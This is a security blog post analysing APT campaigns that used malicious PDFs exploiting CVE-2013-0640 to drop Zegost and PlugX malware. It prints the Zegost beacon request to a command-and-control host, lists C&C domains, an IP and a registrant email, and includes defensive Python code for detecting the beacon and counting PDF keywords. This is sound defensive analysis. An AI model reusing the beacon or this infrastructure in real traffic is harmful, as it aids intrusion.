
    Archive for April 29th, 2013




    Additional text and analysis by Kyle Wilhoit

    Throughout 2012, we saw a wide variety of APT campaigns leverage an exploit in Microsoft Word (CVE-2012-0158). This represented a shift, as previously CVE-2010-3333 was the most commonly used Word vulnerability. While we continue to see CVE-2012-0158 in heavy use, we have noticed increasing use of an exploit for Adobe Reader (CVE-2013-0640) that was made infamous by the “MiniDuke” campaign. The malware dropped by these malicious PDFs is not associated with MiniDuke, but it is associated with ongoing APT campaigns.

    Zegost

    One set of malicious PDFs we found that used this exploit contained decoy documents in Vietnamese; the file names were also in the same language.


    Figure 1. Sample decoy document

    The PDFs contain embedded JavaScript code that is similar to the code used by the MiniDuke campaign. These similarities include similar function and variable names.


    Figure 2. Similar JavaScript code

    Analyzing the PDFs using Didier Stevens’ PDFiD tool shows that the two PDFs are very similar. They may not be identical, but the similarities between the two are hard to deny. The fields of interest here are “/JavaScript”, “/OpenAction”, and “/Page”. These fields indicate, respectively, that JavaScript is present, that some automatic action takes place (typically when the file is opened), and the number of pages. These three items helped us identify the similarities between MiniDuke and Zegost.

    The dropped files and data are also similar. Both campaigns drop the same number of files, with very similar file names, with similar purposes. Even the registry modifications are not too dissimilar.

    However, that is where the similarities end. The payload dropped by these PDFs is known as Zegost (or HTTPTunnel) and has been spotted in previous attacks; it has no connection with the MiniDuke malware payload. The Zegost malware has a distinct beacon:

    GET /cgi/online.asp?hostname=[COMPUTERNAME]&httptype=[1][not%20httptunnel] HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
    Host: dns.yimg.ca
    Cache-Control: no-cache

    The command and control server, dns.yimg.ca, resolves to 223.26.55.122, an IP address that has also been used by better-known command and control servers such as imm.conimes.com and iyy.conimes.com. The email address used to register this domain, llssddzz@gmail.com, has also been used to register scvhosts.com – another known C&C server – and updata-microsoft.com, which is probably also a threat.
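    Matching the beacon above in proxy or IDS data, as an added example written for this page (not code from the original post): it parses a raw HTTP request, scores it against the request path, query parameters, User-Agent and Host quoted above, and alerts on the path plus both parameters. The hostname value in the sample beacon and the benign request are constructed.

```python
from urllib.parse import urlsplit, parse_qs

# Beacon traits taken from the Zegost/HTTPTunnel request quoted in the post.
BEACON_PATH = "/cgi/online.asp"
BEACON_PARAMS = {"hostname", "httptype"}
BEACON_UA = "Mozilla/4.0 (compatible; MSIE 6.0; Win32)"
# C&C hostnames named in the post; extend this set from your own intel feeds.
KNOWN_C2_HOSTS = {"dns.yimg.ca", "imm.conimes.com", "iyy.conimes.com"}


def parse_request(raw):
    """Split a raw HTTP request (request line plus headers) into its parts."""
    lines = raw.strip().splitlines()
    method, target, _version = lines[0].split()
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers


def zegost_traits(raw):
    """Return the beacon traits a request exhibits (empty list = nothing matched)."""
    method, target, headers = parse_request(raw)
    url = urlsplit(target)
    params = parse_qs(url.query, keep_blank_values=True)
    hits = []
    if method == "GET" and url.path.lower() == BEACON_PATH:
        hits.append("path")
    if BEACON_PARAMS <= set(params):
        hits.append("params")
    if headers.get("user-agent") == BEACON_UA:
        hits.append("user-agent")
    if headers.get("host", "").lower() in KNOWN_C2_HOSTS:
        hits.append("known-c2-host")
    return hits


def is_zegost_beacon(raw):
    """Alert on path plus both query parameters; UA and Host only add confidence."""
    hits = zegost_traits(raw)
    return "path" in hits and "params" in hits


# Constructed samples (the hostname WKS-017 is made up): the first mirrors the
# post's beacon, the second is ordinary browsing that must not raise an alert.
BEACON = ("GET /cgi/online.asp?hostname=WKS-017&httptype=[1][not%20httptunnel] HTTP/1.1\n"
          "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)\n"
          "Host: dns.yimg.ca\nCache-Control: no-cache\n")
BENIGN = "GET /index.html HTTP/1.1\nUser-Agent: Mozilla/5.0\nHost: www.example.com\n"
```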

    PlugX

    The second set of malicious PDFs are not necessarily directly related to one another, although they all drop different PlugX variants. The attacks we analyzed appear to have been sent to targets in Japan, South Korea, and India.

    Although these attacks also exploit CVE-2013-0640, they differ from the samples discussed above. Comparing the files shows the differences, such as the PDF version being used:

    PDFiD output for the three samples:

    Field            Zegost     MiniDuke   PlugX
    PDF Header       %PDF-1.4   %PDF-1.4   %PDF-1.7
    obj              8          8          43
    endobj           8          8          44
    stream           3          1          10
    endstream        3          2          11
    xref             1          1          4
    trailer          1          1          4
    startxref        1          1          4
    /Page            1          1          6
    /Encrypt         0          1          0
    /ObjStm          0          0          0
    /JavaScript      1          1          1
    /AA              0          0          0
    /OpenAction      1          1          1
    /AcroForm        1          1          1
    /JBIG2Decode     0          0          0
    /RichMedia       0          0          0
    /Launch          0          0          0
    /EmbeddedFile    0          0          0
    /XFA             1          1          1
    /Colors > 2^24   0          0          0
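    A PDFiD-style keyword count with a triage rule for the /JavaScript plus /OpenAction combination the post calls out, as an added example written for this page (it is not Didier Stevens’ PDFiD itself, though it decodes #xx name escapes the same way). The sample PDF bytes are constructed and the triage rules are the author’s assumptions.

```python
import re

# Keywords PDFiD reports (the /Colors > 2^24 check is a value test, so it is left out).
STRUCTURE = ["obj", "endobj", "stream", "endstream", "xref", "trailer", "startxref"]
NAMES = ["/Page", "/Encrypt", "/ObjStm", "/JavaScript", "/AA", "/OpenAction", "/AcroForm",
         "/JBIG2Decode", "/RichMedia", "/Launch", "/EmbeddedFile", "/XFA"]
# A PDF name token ends at whitespace, a delimiter character, or end of data.
NAME_END = rb"(?=[\s()<>\[\]{}/%]|$)"


def normalise_names(data):
    """Decode #xx hex escapes so /Java#53cript counts as /JavaScript (as PDFiD does)."""
    return re.sub(rb"#([0-9A-Fa-f]{2})", lambda m: bytes([int(m.group(1), 16)]), data)


def pdfid_counts(data):
    """Count structural keywords and names of interest, PDFiD style, in raw PDF bytes."""
    data = normalise_names(data)
    counts = {}
    for kw in STRUCTURE:
        counts[kw] = len(re.findall(rb"\b" + kw.encode() + rb"\b", data))
    for name in NAMES:
        counts[name] = len(re.findall(re.escape(name.encode()) + NAME_END, data))
    return counts


def triage(counts):
    """Explain why a file deserves a closer look; an empty list means nothing stood out."""
    reasons = []
    if counts["/JavaScript"] and (counts["/OpenAction"] or counts["/AA"]):
        reasons.append("JavaScript wired to an automatic action (runs on open)")
    if counts["/Launch"]:
        reasons.append("/Launch action can start an external program")
    if counts["/EmbeddedFile"]:
        reasons.append("embedded file present")
    if counts["/Encrypt"]:
        reasons.append("encrypted: counts may be incomplete, decrypt before judging")
    return reasons


# Constructed single-page sample with a hex-escaped /JavaScript name and an /OpenAction.
SAMPLE_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R >> endobj
4 0 obj << /S /Java#53cript /JS (app.alert(1)) >> endobj
xref
trailer << /Root 1 0 R >>
startxref
0
%%EOF
"""
```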

